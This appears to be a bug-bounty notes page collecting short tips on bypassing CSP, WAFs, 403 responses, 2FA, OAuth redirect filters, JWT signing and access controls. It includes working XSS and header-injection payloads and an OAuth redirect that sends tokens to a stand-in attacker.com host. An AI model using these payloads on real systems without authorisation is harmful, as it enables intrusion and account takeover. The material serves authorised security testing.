Bypasses

​It's possible to bypass #CSP with the following : #JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)>​
​Encountered with AWS WAF? Just add "<!" (without quotes) before your payload and bypass that WAF. :) eg: <!alert(1) #BugBounty #bugbountytip #bugbountytips​
​If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.​
​Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc.  iFrame with javascript URI payload. Line feeds [CRLF] obfuscate it.​
​Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip​
​Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty​
​When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.​
CSP Bypass, script-src 'self' data: - https://twitter.com/404death/status/1191222237782659072​
​Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.
​I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.​
​
OTP bypass - https://twitter.com/HackerHumble​
​sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)​
Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://*.foo.foo:* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ #bugbountytip​
Cloudfront Bypass -
403 Bypass:
https://twitter.com/RathiArpeet/status/1315593774773334016
https://twitter.com/hackerscrolls/status/1254701239360720900
​
Tool - 
​https://github.com/lobuhi/byp4xx​
​h​ttps://github.com/Raywando/4xxbypass​
​https://github.com/sting8k/BurpSuite_403Bypasser​
​
​if “origin” header not work, try with “x-[org name]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc​
​#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...​
​Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.​
​What worked was... \udfff -> � -> ?​
​Therefore... {"redirectUri":"https://attacker\[email protected][victim]/"}​
​Equals... Location: https://[email protected][victim]/​
​JWT Token Bypasses #2:​
1.​Capture the JWT token.​
2.​If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)​
​
​Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu​gbountytip​
Price Manipulation - 
https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20
​
​{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK​
​POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}​
​GET /api_v1/messages?user_id=VICTIM_ID --> 401​
​GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK​
​How to find authentication bypass vulnerabilities. Focus. I Added headers.​
​Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized​
​Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found​
CSP - So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "<svg><link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec​
​
https://twitter.com/iam_j0ker/status/1303658167205728256?s=20
​CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).​
​But I can raise it again to P3 (Iframe Injection) and Triaged.​
​<iframe src= blocked by CSP​
​Solution:​
​<iframe srcdoc=​
​Auth bypass tip:​
​/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true​
​Found:​
​/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:[ + ] PII Info disclosure [ + ] Sensitive info leak [ + ] Access admin endpoint #bugbantytips #bugbountytips​
​1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips​
Application Logic Bypasses
Mobile
Last modified 1yr ago